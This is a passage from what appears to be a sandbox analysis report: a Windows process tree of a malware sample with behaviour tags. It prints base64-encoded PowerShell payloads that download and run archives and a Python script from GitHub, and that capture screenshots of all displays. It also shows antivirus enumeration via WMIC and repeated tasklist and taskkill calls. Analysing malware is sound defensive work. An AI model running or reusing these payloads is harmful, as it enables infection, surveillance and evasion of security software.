BwACIAOwAgAHAAYQB0AGgAPQAiAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwAZABvAGMAdQBtAGUAbgB0ADYALgB6AGkAcAAiAH0ADQAKACAAQAB7AHUAcgBsAD0AIgBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAEsAaQBlAG0AdAByAGEAdQAyADAANQAvAHQAZQBzAHQAYgB5AHAAYQBzAHMALwByAGUAbABlAGEAcwBlAHMALwBkAG8AdwBuAGwAbwBhAGQALwBzAG8AZgB0AHcAYQByAGUALwBkAG8AYwB1AG0AZQBuAHQANwAuAHoAaQBwACIAOwAgAHAAYQB0AGgAPQAiAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwAZABvAGMAdQBtAGUAbgB0ADcALgB6AGkAcAAiAH0ADQAKACAAQAB7AHUAcgBsAD0AIgBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAEsAaQBlAG0AdAByAGEAdQAyADAANQAvAHQAZQBzAHQAYgB5AHAAYQBzAHMALwByAGUAbABlAGEAcwBlAHMALwBkAG8AdwBuAGwAbwBhAGQALwBzAG8AZgB0AHcAYQByAGUALwBkAG8AYwB1AG0AZQBuAHQAOAAuAHoAaQBwACIAOwAgAHAAYQB0AGgAPQAiAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwAZABvAGMAdQBtAGUAbgB0ADgALgB6AGkAcAAiAH0ADQAKACAAQAB7AHUAcgBsAD0AIgBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAEsAaQBlAG0AdAByAGEAdQAyADAANQAvAHQAZQBzAHQAYgB5AHAAYQBzAHMALwByAGUAbABlAGEAcwBlAHMALwBkAG8AdwBuAGwAbwBhAGQALwBzAG8AZgB0AHcAYQByAGUALwBkAG8AYwB1AG0AZQBuAHQAOQAuAHoAaQBwACIAOwAgAHAAYQB0AGgAPQAiAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwAZABvAGMAdQBtAGUAbgB0ADkALgB6AGkAcAAiAH0ADQAKACkADQAKAA0ACgAkAHcAbwByAGsAZQByAHMAIAA9ACAAZgBvAHIAZQBhAGMAaAAgACgAJABmACAAaQBuACAAJABmAGkAbABlAHMAKQAgAHsAIAANAAoAIAAgACQAUwBjAHIAaQBwAHQAQgBsAG8AYwBrACAAPQAgAHsADQAKACAAIAAgACAAUABhAHIAYQBtACgADQAKACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAdQByAGwALAANAAoAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACAAJABwAGEAdABoAA0ACgAgACAAIAAgACkADQAKACAAIAAgACAASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJAB1AHIAbAAgAC0AbwAgACQAcABhAHQAaAAgAA0ACgAgACAAIAAgAEUAeABwAGEAbgBkAC0AQQByAGMAaABpAHYAZQAgACQAcABhAHQAaAAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABQAHUAYgBsAGkAYwBcAGQAbwBjAHUAbQBlAG4AdAANAAoAIAAgAH0ADQAKACAAIABTAHQAYQByAHQALQBKAG8AYgAgAC0ATgBhAG0AZQAgAGEAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgACQAUwBjAHIAaQBwAHQAQgBsAG8AYwBrACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACQAZgAuAHUAcgBsACwAIAAkAGYALgBwAGEAdABoAA0ACgAgAA0ACgB9AA0ACgANAAoADQAKAA0ACgBHAGUAdAAtAEoAbwBiACAAfAAgAFcAYQBpAHQALQBKAG8AYgANAAoASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBLAGkAZQBtAHQAcgBhAHUAMgAwADUALwBUAGUAcwB0AEIAbwB0AC8AbQBhAGkAbgAvAHIAdQBuAC4AcAB5ACAALQBvACAAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABwAHIAbwBqAGUAYwB0AC4AcAB5AA0ACgBDADoAXABVAHMAZQByAHMAXABQAHUAYgBsAGkAYwBcAGQAbwBjAHUAbQBlAG4AdABcAHAAeQB0AGgAbwBuAC4AZQB4AGUAIABDADoAXABVAHMAZQByAHMAXABQAHUAYgBsAGkAYw"BcAHAAcgBvAGo"AZQBjAHQALgBwAHkADQAKAA==
5⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2372

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\c4g5b13g\c4g5b13g.cmdline"
6⤵
- Suspicious use of WriteProcessMemory
PID:3360

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEFAF.tmp" "c:\Users\Admin\AppData\Local\Temp\c4g5b13g\CSC18565F261FB4E879CB3AF5F6A69BEEF.TMP"
7⤵
PID:2196

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3940

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:376

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4600

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3984

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:868

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5256

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5400

C:\Users\Public\document\python.exe
"C:\Users\Public\document\python.exe" C:\Users\Public\project.py
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:6788

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
7⤵
- Suspicious use of WriteProcessMemory
PID:6632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:7028

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4ue3pnln\4ue3pnln.cmdline"
9⤵
- Suspicious use of WriteProcessMemory
PID:6688

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES78F4.tmp" "c:\Users\Admin\AppData\Local\Temp\4ue3pnln\CSCB6E13B8C241B449FB1C4896622CCA45.TMP"
10⤵
PID:5460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
7⤵
- Suspicious use of WriteProcessMemory
PID:3952

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:5152

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
7⤵
- Suspicious use of WriteProcessMemory
PID:5192

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
8⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:6032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
7⤵
- Suspicious use of WriteProcessMemory
PID:3780

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
8⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4472

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
7⤵
- Suspicious use of WriteProcessMemory
PID:5668

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
8⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
7⤵
- Suspicious use of WriteProcessMemory
PID:3580

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
8⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2196

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1156"
7⤵
- Suspicious use of WriteProcessMemory
PID:4444

C:\Windows\system32\taskkill.exe
taskkill /F /PID 1156
8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2408

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 916"
7⤵
PID:5508

C:\Windows\system32\taskkill.exe
taskkill /F /PID 916
8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4816"
7⤵
PID:744

C:\Windows\system32\taskkill.exe
taskkill /F /PID 4816
8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5960

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4292"
7⤵
PID:5884

C:\Windows\system32\taskkill.exe
taskkill /F /PID 4292
8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4456"
7⤵
PID:6004

C:\Windows\system32\taskkill.exe
taskkill /F /PID 4456
8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
7⤵
PID:5228

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
8⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
7⤵
PID:4448

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
8⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:6856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
7⤵
PID:1520

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
8⤵
- Enumerates processes with tasklist
PID:3240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
7⤵
PID:6196

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
8⤵
- Enumerates processes with tasklist
PID:4804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
7⤵
PID:3812

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
8⤵
- Enumerates processes with tasklist
PID:3768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
7⤵
PID:5320

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
8⤵
- Enumerates processes with tasklist
PID:5428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
7⤵
PID:6056

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
8⤵
- Enumerates processes with tasklist
PID:5856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
7⤵
PID:1768

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
8⤵
- Enumerates processes with tasklist
PID:5240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
7⤵
PID:1856

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
8⤵
- Enumerates processes with tasklist
PID:5204

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
7⤵
PID:7060

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
8⤵
- Enumerates processes with tasklist
PID:5520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
7⤵
PID:6548

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
8⤵
- Enumerates processes with tasklist
PID:6868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
7⤵
PID:6892

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
8⤵
- Enumerates processes with tasklist
PID:1108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
7⤵
PID:1952

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
8⤵
- Enumerates processes with tasklist
PID:7032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
7⤵
PID:5484

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
8⤵
- Enumerates processes with tasklist
PID:5980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
7⤵
PID:6220

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
8⤵
- Enumerates processes with tasklist
PID:6448

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
7⤵
PID:116

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
8⤵
- Enumerates processes with tasklist
PID:6272

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
7⤵
PID:6284

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
8⤵
